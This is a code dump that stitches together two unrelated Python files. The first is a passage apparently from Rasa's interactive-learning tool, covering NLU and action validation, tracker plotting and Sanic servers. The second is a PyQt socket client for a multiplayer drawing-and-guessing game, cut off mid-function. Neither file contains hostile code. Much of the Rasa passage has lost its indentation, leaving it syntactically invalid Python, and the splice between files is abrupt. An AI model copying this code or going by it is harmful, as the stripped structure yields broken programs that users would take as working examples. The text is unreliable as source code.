nlu_data = previous_examples.merge(TrainingData(msgs))
    # guess the format of the target file before opening it for writing
nlu_format = _get_nlu_target_format(export_nlu_path)
if nlu_format == MARKDOWN:
stringified_training_data = nlu_data.nlu_as_markdown()
else:
stringified_training_data = nlu_data.nlu_as_json()
io_utils.write_text_file(stringified_training_data, export_nlu_path)
def _get_nlu_target_format(export_path: Text) -> Text:
guessed_format = loading.guess_format(export_path)
if guessed_format not in {MARKDOWN, RASA}:
if export_path.endswith(".json"):
guessed_format = RASA
else:
guessed_format = MARKDOWN
return guessed_format
def _entities_from_messages(messages: List[Message]) -> List[Text]:
"""Return all entities that occur in at least one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages: List[Message]) -> Set[Text]:
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES # type: Dict[Text, List[Dict[Text, Any]]]
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
sender_id: Text,
sender_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
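        # take the highest-scoring prediction as the proposed next action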
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(
sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, sender_id
)
await _plot_trackers(sender_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cliutils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, sender_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cliutils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
sender_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, sender_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id) -> None:
"""Ask a user whether an input for a form should be validated.
Prior to this call, the active form was chosen again after it had been rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot)
)
validate_input = await _ask_questions(validation_questions, sender_id, endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(f"The bot wants to run '{action_name}', correct?")
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
sender_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, sender_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, sender_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
return MarkdownWriter.generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
return intent in intents
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
"Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?".format(intent, text)
)
else:
message = (
"Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?".format(text, intent)
)
if intent is None:
print(f"The NLU classification for '{text}' returned '{intent}'")
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, sender_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities."""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader().parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
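# Illustrative note (not part of the original module): the "[value](type)" prompt
# above refers to Rasa's Markdown entity annotation. Assuming the standard syntax,
# an annotated answer and the entities parsed from it look roughly like:
#
#   annotation = "book a flight to [Berlin](city)"
#   parsed = MarkdownReader().parse_training_example(annotation)
#   # parsed.get("entities") ~ [{"value": "Berlin", "entity": "city", ...}]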
def _merge_annotated_and_original_entities(
parse_annotated: Message, parse_original: Dict[Text, Any]
) -> List[Dict[Text, Any]]:
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other) -> bool:
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, sender_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, sender_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(
sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = "Visualisation at {}/visualization.html.".format(
visualization_url
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
"Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help)
)
async def record_messages(
endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
stories: Optional[Text] = None,
skip_visualization: bool = False,
):
"""Read messages from the command line and print bot responses."""
try:
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
"Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url)
)
return
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
if not skip_visualization:
events_including_current_user_id = await _get_tracker_events_to_plot(
domain, stories, sender_id
)
plot_file = DEFAULT_STORY_GRAPH_FILE
await _plot_trackers(events_including_current_user_id, plot_file, endpoint)
else:
# `None` means that future `_plot_trackers` calls will also skip the
# visualization.
plot_file = None
events_including_current_user_id = []
_print_help(skip_visualization)
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(
endpoint, sender_id, events_including_current_user_id, plot_file
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id, Restarted().as_dict())
await send_event(
endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
events_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(
events_including_current_user_id, plot_file, endpoint
)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
async def _get_tracker_events_to_plot(
domain: Dict[Text, Any], stories: Optional[Text], sender_id: Text
) -> List[Union[Text, List[Event]]]:
training_trackers = await _get_training_trackers(stories, domain)
number_of_trackers = len(training_trackers)
if number_of_trackers > MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION:
rasa.cli.utils.print_warning(
f"You have {number_of_trackers} different story paths in "
f"your training data. Visualizing them is very resource "
f"consuming. Hence, the visualization will only show the stories "
f"which you created during interactive learning, but not your "
f"training stories."
)
training_trackers = []
training_data_events = [t.events for t in training_trackers]
events_including_current_user_id = training_data_events + [sender_id]
return events_including_current_user_id
async def _get_training_trackers(
stories: Optional[Text], domain: Dict[str, Any]
) -> List[DialogueStateTracker]:
from rasa.core import training
return await training.load_data(
stories,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
def _serve_application(app: Sanic, stories, skip_visualization) -> Sanic:
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(
args, endpoints, additional_arguments, app, loop
) -> None:
_interpreter = NaturalLanguageInterpreter.create(endpoints.nlu or args.get("nlu"))
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(
endpoint, max_retries=30, sleep_between_retries=1
) -> bool:
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info(f"Reached core: {r}")
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
stories: Text = None,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None,
):
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=(DEFAULT_STORY_GRAPH_FILE,))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("model"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints, additional_arguments),
"before_server_start",
)
_serve_application(app, stories, skip_visualization)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
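# Illustrative sketch (not part of the original module): `run_interactive_learning`
# only reads a few keys from `server_args`; note that "e2e" is read unconditionally.
# The paths below are hypothetical placeholders.
#
#   run_interactive_learning(
#       stories="data/stories.md",
#       server_args={
#           "model": "models/my-model.tar.gz",
#           "endpoints": "endpoints.yml",
#           "e2e": False,
#       },
#   )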
|
ConnectionHandler.py
|
import socket
import threading
import logging
import json
import sys
import time
from PyQt5 import QtWidgets, QtCore, QtGui
from . import SocketMsgHandler
from Utils.PopUpWindow import PopUpWindow
from Application.GameWindow import GameWindow
class ConnectionHandler(QtCore.QObject):
room_created_signal = QtCore.pyqtSignal(dict)
room_joined_signal = QtCore.pyqtSignal(dict)
chat_message_signal = QtCore.pyqtSignal(dict)
scoreboard_update_signal = QtCore.pyqtSignal(dict)
switch_window = QtCore.pyqtSignal(str)
start_game_signal = QtCore.pyqtSignal(dict)
word_selection_signal = QtCore.pyqtSignal(dict)
word_hint_signal = QtCore.pyqtSignal(dict)
player_left_signal = QtCore.pyqtSignal(dict)
player_joined_signal = QtCore.pyqtSignal(dict)
draw_stroke_signal = QtCore.pyqtSignal(dict)
undo_last_stroke_signal = QtCore.pyqtSignal()
clear_canvas_signal = QtCore.pyqtSignal()
guess_correct_signal = QtCore.pyqtSignal(dict)
artist_change_signal = QtCore.pyqtSignal(dict)
game_over_signal = QtCore.pyqtSignal(dict)
room_list_signal = QtCore.pyqtSignal(dict)
owner_changed_signal = QtCore.pyqtSignal(dict)
def __init__(self):
super().__init__()
self.connectedReceiverStatus = True
self.server_config = self._load_config_file()
self.SERVER = self.server_config['SERVER']
self.PORT = self.server_config['PORT']
self.ADDR = (self.SERVER, self.PORT)
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect(self.ADDR)
self.receiver_thread = threading.Thread(
target=self.receive, args=(self.conn, self.server_config)
)
self.receiver_thread.daemon = True
self.receiver_thread.start()
def kill_receiver(self):
try:
self.connectedReceiverStatus = False
self.conn.shutdown(socket.SHUT_RDWR)
self.conn.close()
self.receiver_thread.join()
except:
logging.debug('[SOCKET RECEIVER] Unsuccessful socket shutdown!')
logging.debug('[EXITING CONFIRMED] Killing all threads and exiting the client window')
def _load_config_file(self):
try:
config_path = sys.argv[1]
with open(config_path, 'r') as config_file:
return json.load(config_file)
except:
logging.error('[LOADING CONFIG FILE] Error occurred when loading configuration file!')
exit()
def is_connection_receiver_connected(self):
return self.connectedReceiverStatus
def receive(self, conn, server_config):
while self.connectedReceiverStatus:
logging.debug('[SOCKET RECEIVER] Awaiting incoming messages ...')
received_msg_name = None
received_msg = None
try:
received_msg_name, received_msg = SocketMsgHandler.receive(conn, server_config)
if not received_msg:
continue
except:
    logging.debug('[SOCKET RECEIVER] Shutting down and closing socket connection')
    break
if received_msg_name == 'DrawStrokeBc':
logging.debug('[SOCKET RECEIVER] Received Message: {}'.format('DrawStrokeBc'))
else:
logging.debug('[SOCKET RECEIVER] Received Message: {}'.format(received_msg))
self.dispatch_received_message(received_msg)
def dispatch_received_message(self, received_msg):
message_dispatcher = {
'CreateRoomResp': self.handle_CreateRoomResp,
'JoinRoomResp': self.handle_JoinRoomResp,
'ChatMessageBc': self.handle_ChatMessageBc,
'StartGameResp': self.handle_StartGameResp,
'StartGameBc': self.handle_StartGameBc,
'ArtistPickBc': self.handle_ArtistPickBc,
'WordSelectionReq': self.handle_WordSelectionReq,
'DrawStrokeBc': self.handle_DrawStrokeBc,
'UndoLastStrokeBc': self.handle_UndoLastStrokeBc,
'ClearCanvasBc': self.handle_ClearCanvasBc,
'WordGuessedBc': self.handle_WordGuessedBc,
'FinishGameResp': self.handle_FinishGameResp,
'GameFinishedBc': self.handle_GameFinishedBc,
'GameRoomListResp': self.handle_GameRoomListResp,
'WordHintBc': self.handle_WordHintBc,
'UpdateScoreboardBc': self.handle_UpdateScoreboardBc,
'OwnerChangedBc': self.handle_OwnerChangedBc,
}
return message_dispatcher.get(received_msg['msg_name'], self.handle_UnrecognizedMessage)(
received_msg
)
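# Illustrative note (not part of the original module): every handler above keys into
# `received_msg` by field name, so an incoming chat broadcast is assumed to be a
# dict shaped roughly like:
#
#   {"msg_name": "ChatMessageBc", "author": "some_user", "message": "hello"}
#
# Unknown `msg_name` values fall through to `handle_UnrecognizedMessage`.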
def handle_CreateRoomResp(self, received_msg):
    if received_msg['status'] == 'OK':
        self.switch_window.emit(received_msg['room_code'])
        self.room_created_signal.emit(received_msg)
        logging.debug('[MESSAGE DISPATCHER] handling CreateRoomResp Successful, STATUS OK')
    else:
        PopUpWindow('Room could not be created!', 'ERROR')
        logging.debug('[MESSAGE DISPATCHER] handling CreateRoomResp failed, STATUS NOK')
def handle_JoinRoomResp(self, received_msg):
    with GameWindow.thread_lock:
        if received_msg['status'] == 'OK':
            # TODO: enhance window switching
            self.switch_window.emit('Joining')
            self.room_joined_signal.emit(received_msg)
            logging.debug('[MESSAGE DISPATCHER] handling JoinRoomResp Successful, STATUS OK')
        else:
            PopUpWindow('Could not join the room!\n{}'.format(received_msg['info']), 'ERROR')
            logging.debug('[MESSAGE DISPATCHER] handling JoinRoomResp failed, STATUS NOK')
def handle_ChatMessageBc(self, received_msg):
with GameWindow.thread_lock:
logging.debug(
'[MESSAGE DISPATCHER] handling ChatMessageBc {}: {}'.format(
received_msg['author'], received_msg['message']
)
)
self.chat_message_signal.emit(received_msg)
def handle_ExitClientReq(self, received_msg):
self.kill_receiver()
self.chat_message_signal.emit('{} has left the game'.format(received_msg['user_name']))
logging.debug('[MESSAGE DISPATCHER] handling ExitClientReq Successful, STATUS OK')
def handle_StartGameResp(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling StartGameResp, STATUS {}'.format(received_msg['status'])
)
if received_msg['status'] == 'NOT_OK':
PopUpWindow(received_msg['info'], 'ERROR')
def handle_StartGameBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling StartGameBc, Artist: {}'.format(received_msg['artist'])
)
self.start_game_signal.emit(received_msg)
self.artist_change_signal.emit(received_msg)
def handle_ArtistPickBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling ArtistPickBc, Artist: {}'.format(received_msg['artist'])
)
self.artist_change_signal.emit(received_msg)
def handle_WordSelectionReq(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling WordSelectionReq, Word List: {}'.format(
received_msg['word_list']
)
)
self.word_selection_signal.emit(received_msg)
def handle_DrawStrokeBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling DrawStrokeBc')
self.draw_stroke_signal.emit(received_msg)
def handle_UndoLastStrokeBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling UndoLastStrokeBc')
self.undo_last_stroke_signal.emit()
def handle_ClearCanvasBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling ClearCanvasBc')
self.clear_canvas_signal.emit()
def handle_WordGuessedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling WordGuessedBc')
self.guess_correct_signal.emit(received_msg)
logging.debug(
'[GUESS CORRECT] {} has guessed the word and gained {} points'.format(
received_msg['user_name'], received_msg['score_awarded'][received_msg['user_name']]
)
)
def handle_FinishGameResp(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling FinishGameResp')
self.game_over_signal.emit(received_msg)
def handle_GameFinishedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling GameFinishedBc')
self.game_over_signal.emit(received_msg)
def handle_GameRoomListResp(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling GameRoomListResp')
self.room_list_signal.emit(received_msg)
def handle_WordHintBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling WordHintBc')
self.word_hint_signal.emit(received_msg)
def handle_OwnerChangedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling OwnerChangedBc {}'.format(received_msg))
self.owner_changed_signal.emit(received_msg)
def handle_UpdateScoreboardBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling UpdateScoreboardBc {}'.format(received_msg)
)
self.scoreboard_update_signal.emit(received_msg)
def handle_UnrecognizedMessage(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] No defined handler for message: {}'.format(received_msg)
)
def send_create_room_req(self, user_name):
send_create_room_req_msg = {'msg_name': 'CreateRoomReq', 'user_name': user_name}
SocketMsgHandler.send(self.conn, send_create_room_req_msg, self.server_config)
def send_join_room_req(self, user_name, room_code):
send_join_room_req_msg = {
'msg_name': 'JoinRoomReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, send_join_room_req_msg, self.server_config)
def send_chat_msg_req(self, user_name, room_code, message):
logging.debug('[CHAT MESSAGE] Sending message {}: {}'.format(user_name, message))
send_chat_msg = {
'msg_name': 'ChatMessageReq',
'user_name': user_name,
'room_code': room_code,
'message': message,
}
SocketMsgHandler.send(self.conn, send_chat_msg, self.server_config)
def send_exit_client_req(self, user_name, room_code):
notify_server_about_leaving = {
'msg_name': 'ExitClientReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, notify_server_about_leaving, self.server_config)
def send_socket_disconnect_req(self):
socket_disconnect_req = {'msg_name': 'DisconnectSocketReq'}
SocketMsgHandler.send(self.conn, socket_disconnect_req, self.server_config)
def send_start_game_req(self, user_name, room_code):
start_game_req = {
'msg_name': 'StartGameReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, start_game_req, self.server_config)
def send_word_selection_resp(self, user_name, room_code, selected_word):
logging.debug(
'[SENDING MESSAGE] WordSelectionResp, selected word = {}'.format(selected_word)
)
word_selection_resp = {
'msg_name': 'WordSelectionResp',
'user_name': user_name,
'room_code': room_code,
'selected_word': selected_word,
}
SocketMsgHandler.send(self.conn, word_selection_resp, self.server_config)
def send_draw_stroke_req(self, user_name, room_code, stroke_coordinates):
draw_stroke_req = {
'msg_name': 'DrawStrokeReq',
'user_name': user_name,
'room_code': room_code,
'stroke_coordinates': stroke_coordinates,
}
SocketMsgHandler.send(self.conn, draw_stroke_req, self.server_config)
def send_undo_last_stroke_req(self, user_name, room_code):
undo_last_stroke_req = {
'msg_name': 'UndoLastStrokeReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, undo_last_stroke_req, self.server_config)
def send_clear_canvas_req(self, user_name, room_code):
clear_canvas_req = {
'msg_name': 'ClearCanvasReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, clear_canvas_req, self.server_config)
def send_finish_game_req(self, user_name, room_code):
finish_game_req = {
'msg_name': 'FinishGameReq',
'user_name': user_name,
